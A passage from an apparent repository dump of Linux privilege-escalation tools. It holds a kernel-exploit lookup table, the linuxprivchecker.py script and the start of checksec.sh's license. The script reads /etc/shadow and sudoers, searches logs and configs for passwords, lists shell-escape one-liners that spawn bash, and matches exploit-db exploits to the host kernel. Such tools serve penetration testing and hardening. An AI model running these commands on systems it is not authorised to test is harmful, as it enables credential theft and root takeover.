'2.6.28', '2.6.29', 421 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', 422 | ], 423 | cve => '2010-3081', 424 | mil => 'http://www.exploit-db.com/exploits/15024/', 425 | }, 426 | 'memodipper' => { 427 | vuln => [ 428 | '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', 429 | '3.0.5', '3.0.6', '3.1.0', 430 | ], 431 | cve => '2012-0056', 432 | mil => 'http://www.exploit-db.com/exploits/18411/', 433 | }, 434 | 'semtex' => { 435 | vuln => [ 436 | '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2', 437 | '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', 438 | ], 439 | cve => '2013-2094', 440 | mil => 'http://www.exploit-db.com/download/25444/‎', 441 | }, 442 | 'perf_swevent' => { 443 | vuln => [ 444 | '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', 445 | '3.0.6', '3.1.0', '3.2', '3.3', '3.4.0', '3.4.1', 446 | '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8', 447 | '3.4.9', '3.5', '3.6', '3.7', '3.8.0', '3.8.1', 448 | '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7', 449 | '3.8.8', '3.8.9', 450 | ], 451 | cve => '2013-2094', 452 | mil => 'http://www.exploit-db.com/download/26131', 453 | }, 454 | 'msr' => { 455 | vuln => [ 456 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 457 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28', 458 | '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', 459 | '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0', 460 | '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', 461 | '3.1.0', '3.2', '3.3', '3.4', '3.5', '3.6', 462 | '3.7.0', '3.7.6', 463 | ], 464 | cve => '2013-0268', 465 | mil => 'http://www.exploit-db.com/exploits/27297/', 466 | }, 467 | ); 468 | } 469 | -------------------------------------------------------------------------------- /linux_privesc.py: -------------------------------------------------------------------------------- 1 | #!/usr/env python 2 | 3 | ############################################################################################################### 4 | ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script 5 | ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift 6 | ##------------------------------------------------------------------------------------------------------------- 7 | ## [Details]: 8 | ## This script is intended to be executed locally on a Linux box to enumerate basic system info and 9 | ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text 10 | ## passwords and applicable exploits. 11 | ##------------------------------------------------------------------------------------------------------------- 12 | ## [Warning]: 13 | ## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates, 14 | ## I did not write it to be efficient and in some cases you may find the functions may not produce the desired 15 | ## results. For example, the function that links packages to running processes is based on keywords and will 16 | ## not always be accurate. Also, the exploit list included in this function will need to be updated over time. 17 | ## Feel free to change or improve it any way you see fit. 18 | ##------------------------------------------------------------------------------------------------------------- 19 | ## [Modification, Distribution, and Attribution]: 20 | ## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original 21 | ## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's 22 | ## worth anything anyway :) 23 | ############################################################################################################### 24 | 25 | # conditional import for older versions of python not compatible with subprocess 26 | try: 27 | import subprocess as sub 28 | compatmode = 0 # newer version of python, no need for compatibility mode 29 | except ImportError: 30 | import os # older version of python, need to use os instead 31 | compatmode = 1 32 | 33 | # title / formatting 34 | bigline = "=================================================================================================" 35 | smlline = "-------------------------------------------------------------------------------------------------" 36 | 37 | print bigline 38 | print "LINUX PRIVILEGE ESCALATION CHECKER" 39 | print bigline 40 | print 41 | 42 | # loop through dictionary, execute the commands, store the results, return updated dict 43 | def execCmd(cmdDict): 44 | for item in cmdDict: 45 | cmd = cmdDict[item]["cmd"] 46 | if compatmode == 0: # newer version of python, use preferred subprocess 47 | out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate() 48 | results = out.split('\n') 49 | else: # older version of python, use os.popen 50 | echo_stdout = os.popen(cmd, 'r') 51 | results = echo_stdout.read().split('\n') 52 | cmdDict[item]["results"]=results 53 | return cmdDict 54 | 55 | # print results for each previously executed command, no return value 56 | def printResults(cmdDict): 57 | for item in cmdDict: 58 | msg = cmdDict[item]["msg"] 59 | results = cmdDict[item]["results"] 60 | print "[+] " + msg 61 | for result in results: 62 | if result.strip() != "": 63 | print " " + result.strip() 64 | print 65 | return 66 | 67 | def writeResults(msg, results): 68 | f = open("privcheckout.txt", "a"); 69 | f.write("[+] " + str(len(results)-1) + " " + msg) 70 | for result in results: 71 | if result.strip() != "": 72 | f.write(" " + result.strip()) 73 | f.close() 74 | return 75 | 76 | # Basic system info 77 | print "[*] GETTING BASIC SYSTEM INFO...\n" 78 | 79 | results=[] 80 | 81 | sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results}, 82 | "KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results}, 83 | "HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results} 84 | } 85 | 86 | sysInfo = execCmd(sysInfo) 87 | printResults(sysInfo) 88 | 89 | # Networking Info 90 | 91 | print "[*] GETTING NETWORKING INFO...\n" 92 | 93 | netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results}, 94 | "ROUTE":{"cmd":"route", "msg":"Route", "results":results}, 95 | "NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results} 96 | } 97 | 98 | netInfo = execCmd(netInfo) 99 | printResults(netInfo) 100 | 101 | # File System Info 102 | print "[*] GETTING FILESYSTEM INFO...\n" 103 | 104 | driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results}, 105 | "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results} 106 | } 107 | 108 | driveInfo = execCmd(driveInfo) 109 | printResults(driveInfo) 110 | 111 | # Scheduled Cron Jobs 112 | cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results}, 113 | "CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results} 114 | } 115 | 116 | cronInfo = execCmd(cronInfo) 117 | printResults(cronInfo) 118 | 119 | # User Info 120 | print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n" 121 | 122 | userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results}, 123 | "ID":{"cmd":"id","msg":"Current User ID", "results":results}, 124 | "ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results}, 125 | "SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results}, 126 | "HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results}, 127 | "ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results}, 128 | "SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results}, 129 | "LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results} 130 | } 131 | 132 | userInfo = execCmd(userInfo) 133 | printResults(userInfo) 134 | 135 | if "root" in userInfo["ID"]["results"][0]: 136 | print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n" 137 | 138 | # File/Directory Privs 139 | print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n" 140 | 141 | fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results}, 142 | "WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results}, 143 | "WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results}, 144 | "SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results}, 145 | "ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results} 146 | } 147 | 148 | fdPerms = execCmd(fdPerms) 149 | printResults(fdPerms) 150 | 151 | pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results}, 152 | "CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results}, 153 | "SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results} 154 | } 155 | 156 | pwdFiles = execCmd(pwdFiles) 157 | printResults(pwdFiles) 158 | 159 | # Processes and Applications 160 | print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n" 161 | 162 | if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]: 163 | getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian 164 | else: 165 | getPkgs = "rpm -qa | sort -u" # RH/other 166 | 167 | getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results}, 168 | "PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results} 169 | } 170 | 171 | getAppProc = execCmd(getAppProc) 172 | printResults(getAppProc) # comment to reduce output 173 | 174 | otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results}, 175 | "APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results}, 176 | "APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results} 177 | } 178 | 179 | otherApps = execCmd(otherApps) 180 | printResults(otherApps) 181 | 182 | print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n" 183 | 184 | # find the package information for the processes currently running 185 | # under root or another super user 186 | 187 | procs = getAppProc["PROCS"]["results"] 188 | pkgs = getAppProc["PKGS"]["results"] 189 | supusers = userInfo["SUPUSERS"]["results"] 190 | procdict = {} # dictionary to hold the processes running as super users 191 | 192 | for proc in procs: # loop through each process 193 | relatedpkgs = [] # list to hold the packages related to a process 194 | try: 195 | for user in supusers: # loop through the known super users 196 | if (user != "") and (user in proc): # if the process is being run by a super user 197 | procname = proc.split(" ")[4] # grab the process name 198 | if "/" in procname: 199 | splitname = procname.split("/") 200 | procname = splitname[len(splitname)-1] 201 | for pkg in pkgs: # loop through the packages 202 | if not len(procname) < 3: # name too short to get reliable package results 203 | if procname in pkg: 204 | if procname in procdict: 205 | relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list 206 | if pkg not in relatedpkgs: 207 | relatedpkgs.append(pkg) # add pkg to the list 208 | procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry 209 | except: 210 | pass 211 | 212 | for key in procdict: 213 | print " " + key # print the process name 214 | try: 215 | if not procdict[key][0] == "": # only print the rest if related packages were found 216 | print " Possible Related Packages: " 217 | for entry in procdict[key]: 218 | print " " + entry # print each related package 219 | except: 220 | pass 221 | 222 | # EXPLOIT ENUMERATION 223 | 224 | # First discover the avaialable tools 225 | print 226 | print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n" 227 | 228 | devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}} 229 | devTools = execCmd(devTools) 230 | printResults(devTools) 231 | 232 | print "[+] Related Shell Escape Sequences...\n" 233 | escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]} 234 | for cmd in escapeCmd: 235 | for result in devTools["TOOLS"]["results"]: 236 | if cmd in result: 237 | for item in escapeCmd[cmd]: 238 | print " " + cmd + "-->\t" + item 239 | print 240 | print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n" 241 | 242 | # Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB) 243 | # sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os' 244 | sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 245 | "< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 246 | "2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}}, 247 | "<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 248 | "2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 249 | "<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 250 | "2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 251 | "2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 252 | "2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}}, 253 | "<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 254 | "MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}}, 255 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 256 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 257 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 258 | "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}}, 259 | "<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 260 | "2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 261 | "Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}}, 262 | "Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 263 | "< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}}, 264 | "2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 265 | "2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}}, 266 | "Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}}, 267 | "Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 268 | "< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 269 | "2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}}, 270 | "2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}}, 271 | "2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 272 | "2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 273 | "Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 274 | "Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 275 | "PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}}, 276 | "2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 277 | "2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 278 | "2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 279 | "2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 280 | "2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 281 | "< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 282 | "< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 283 | "2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 284 | "2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 285 | "2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}}, 286 | "'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}}, 287 | "2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 288 | "Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}}, 289 | "<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}}, 290 | "Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}}, 291 | "< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 292 | "Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 293 | "Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 294 | "<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 295 | "< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 296 | "CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 297 | "CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 298 | "< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 299 | "Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}}, 300 | "2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 301 | "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 302 | "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 303 | "Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}}, 304 | "open-time Capability file_ns_capable() - Privilege Escalation Vulnerability":{"minver":"0", "maxver":"99", "exploitdb":"25307", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 305 | "open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}}, 306 | } 307 | 308 | # variable declaration 309 | os = sysInfo["OS"]["results"][0] 310 | version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0] 311 | langs = devTools["TOOLS"]["results"] 312 | procs = getAppProc["PROCS"]["results"] 313 | kernel = str(sysInfo["KERNEL"]["results"][0]) 314 | mount = driveInfo["MOUNT"]["results"] 315 | #pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit appicability but my in future 316 | 317 | 318 | # lists to hold ranked, applicable sploits 319 | # note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks 320 | # all applicable exploits should be checked and this function could probably use some improvement 321 | avgprob = [] 322 | highprob = [] 323 | 324 | for sploit in sploits: 325 | lang = 0 # use to rank applicability of sploits 326 | keyword = sploits[sploit]["keywords"]["val"] 327 | sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"] 328 | # first check for kernell applicability 329 | if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]): 330 | # next check language applicability 331 | if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))): 332 | lang = 1 # language found, increase applicability score 333 | elif sploits[sploit]["lang"] == "sh": 334 | lang = 1 # language found, increase applicability score 335 | elif (sploits[sploit]["lang"] in str(langs)): 336 | lang = 1 # language found, increase applicability score 337 | if lang == 0: 338 | sploitout = sploitout + "**" # added mark if language not detected on system 339 | # next check keyword matches to determine if some sploits have a higher probability of success 340 | for loc in sploits[sploit]["keywords"]["loc"]: 341 | if loc == "proc": 342 | for proc in procs: 343 | if keyword in proc: 344 | highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability 345 | break 346 | break 347 | elif loc == "os": 348 | if (keyword in os) or (keyword in kernel): 349 | highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability 350 | break 351 | elif loc == "mnt": 352 | if keyword in mount: 353 | highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability 354 | break 355 | else: 356 | avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version 357 | 358 | print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!" 359 | print 360 | 361 | print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system" 362 | for exploit in highprob: 363 | print " - " + exploit 364 | print 365 | 366 | print " The following exploits are applicable to this kernel version and should be investigated as well" 367 | for exploit in avgprob: 368 | print " - " + exploit 369 | 370 | print 371 | print "Finished" 372 | print bigline 373 | 374 | -------------------------------------------------------------------------------- /linux_checksec.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # The BSD License (http://www.opensource.org/licenses/bsd-license.php) 4 | # specifies the terms and conditions of use for checksec.sh: 5 | # 6 | # Copyright (c) 2009-2011, Tobias Klein. 7 | # All rights reserved. 8 | # 9 | # Redistribution and use in source and binary forms, with or without 10 | # modification, are permitted provided that the following conditions 11 | # are met: 12 | # 13 | # * Redistributions of source code must retain the above copyright 14 | # notice, this list of conditions and the following disclaimer. 15 | # * Redistributions in binary form must reproduce the above copyright 16 | # notice, this list of conditions and the following disclaimer in 17 | # the documentation and/or other materials provided with the 18 | # distribution. 19 | # * Neither the name of Tobias Klein nor the name of trapkit.de may be 20 | # used to endorse or promote products derived from this software 21 | # without specific prior written permission. 22 | # 23 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 24 | # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 25 | # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 26 | # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE 27 | # COPYRIGHT HOLDER OR CONTRIBUTORS 